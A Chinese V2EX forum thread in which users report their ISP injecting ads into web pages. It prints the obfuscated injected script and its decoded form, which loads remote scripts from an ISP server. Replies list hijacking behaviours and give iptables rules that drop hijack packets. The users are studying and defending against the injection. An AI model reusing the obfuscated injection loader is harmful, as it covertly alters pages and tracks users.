移动宽带访问 51credit,百度等网站居然添加广告

2015-02-24 15:03:29 +08:00
 yetsky
代码如下,居然还是加密的。

<script>var d="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;00322/249/318/33:;6873903/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00322/249/318/33:;687390d/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00322/249/318/33:;6873903/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!q>#iuuq;00322/249/318/33:;687390b0t@beje>311615'uddb>NUN5NUNxPUB3PUV>'vsjq>279327:544'tqpsu>";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="1'fqpsu>1'psmv>bIS1dEpwM3Kjdz52NXOz[XSqeD6kc31w[n:zeX1uN{huNT6peH2t'tqje>2783743675'bsfb>2:7'ut>2535869883'bpsmv>bIS1dEpwM{JyNT5yN{hvNkB4MkJzPUp2O{ZzPD9zNEB2NERw'q2bsn>463'q3bsn>611'q4bsn>21'q5bsn>6'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)q*#!pocfgpsfvompbe>#ttu)*#?=0cpez?=0iunm?";document.write(i(d,c));</script>
5538 次点击
所在节点    DNS
17 条回复
yetsky
2015-02-24 15:17:59 +08:00
解密后
<html><head><link rel="stylesheet" type="text/css" href="http://211.138.207.229:57628/2.css"><script type="text/javascript" src="http://211.138.207.229:57628/c.js"></script><script type="text/javascript" src="http://211.138.207.229:57628/2.js"></script><script type="text/javascript">var p="http://211.138.207.229:57628/a/s?adid=200504&tcca=MTM4MTMwOTA2OTU=&urip=1682169433&sport=0&eport=0&orlu=aHR0cDovL2Jicy41MWNyZWRpdC5jb20vZm9ydW0tMzgtMS5odG1s&spid=1672632564&area=196&ts=1424758772&aorlu=aHR0cDovLzIxMS4xMzguMjA3LjIyOTo1NzYyOC8yMDA1MDQv&p1arm=352&p2arm=500&p3arm=10&p4arm=5&p5arm=3&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0";</script></head><body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no onload="init(p)" onbeforeunload="sst()"></body></html>
arachide
2015-02-24 15:26:30 +08:00
正常
百度 360 金山 搜狗
是中国4大垃圾软件厂商

慎用

偶是不用 大把更好性能的工具 何必去找虐
wdlth
2015-02-24 15:29:47 +08:00
连电信都加,移动铁通还用说?
tdifg
2015-02-24 15:33:35 +08:00
哎,你是没用过长城宽带
arachide
2015-02-24 15:35:19 +08:00
你去网吧试试bing
保准到百度

哈哈
isnowify
2015-02-24 15:40:56 +08:00
电信访问什么都加,手机端加完广告后整个页面都变得如此细长,惨不忍睹。。。
另外
@Livid should move to http://v2ex.com/go/bb
貌似v2ex支持回复翻页了?
zsx
2015-02-24 16:00:22 +08:00
福州铁通,行为包括:
1. 概率:相当大;劫持百度统计的统计js,行为包括:点击带百度统计的网站的任何位置都会被跳转到某页游网站、右下角弹窗其中之一;
2. 概率:100%;在PCQQ好友面板的 [动态] 和手机QQ空间触屏版投放右下角广告;
3. 概率:100%;把114DNS和Google DNS劫持到自己的DNS;
4. 概率:看心情;百度首页,强制加推广链接并清空Cookies(嗯强制退出百度账号哦)。曾经导致百度搜索无法翻页,点击第二页等强制跳转到第一页。
5. 概率:每日首次访问100%,剩下看心情;淘宝、京东等,跳转到自己的返利链接;
6. 概率:看心情;随机跳转到别的网站(比如打开zhihu.com跳到了电影站)。

另外百度首页的跳转证据还很难抓,我自己用cURL的时候就正常,还要大改HTTP头完全模拟浏览器才能抓得到……而且不定时……我要抓的时候就消失了……
nvidiaAMD980X
2015-02-24 16:57:12 +08:00
百度和Bing的页面也不整洁,Bing搜索框莫名其妙地下拉新闻给你,百度就是个广告流氓~~~最喜欢Google了,但每次搜索都要挂V---P----N。
Silicon
2015-02-24 17:25:38 +08:00
以下几条 辽宁铁通保平安
请根据自己情况修改
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m ttl --ttl-eq 124 -j LOG --log-prefix "Caught bad ttl of hijack: "
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m ttl --ttl-eq 124 -m comment --comment "Bad ttl of hijack" -j DROP
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0xce56" -j LOG --log-prefix "Caught bad window of hijack"
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0xce56" -m comment --comment "Bad window of hijack" -j DROP
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0x800" -j LOG --log-prefix "Caught bad window of hijack"
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0x800" -m comment --comment "Bad window of hijack" -j DROP
kiritoalex
2015-02-24 21:18:42 +08:00
@Silicon 赞一个
s3040608090
2015-02-24 23:22:28 +08:00
我也是用移动宽带,之前手机连wifi上一些网站(比如v2ex)经常上下两条广告,用dnscrypt解决。
Halry
2015-02-25 08:52:27 +08:00
没用过长城?什么http网页都给你加
groot
2015-02-25 08:54:36 +08:00
@arachide 同意,我反正是抵制百毒,360很多年了,都是些没节操的公司
mackyzhan
2015-02-25 09:17:53 +08:00
希望HTTPS赶快普及起来,中国公司哪有节操可言。
moxiaotiao
2015-02-25 12:12:47 +08:00
@zsx 笑死我了
nn574204775
2015-02-25 17:58:32 +08:00
就在用移动 没出现上面说的情况 0.0 只是改了默认DNS
shippo7
2015-02-25 23:17:03 +08:00
@Livid 一楼代码Chrome下超出边界

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/172479

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX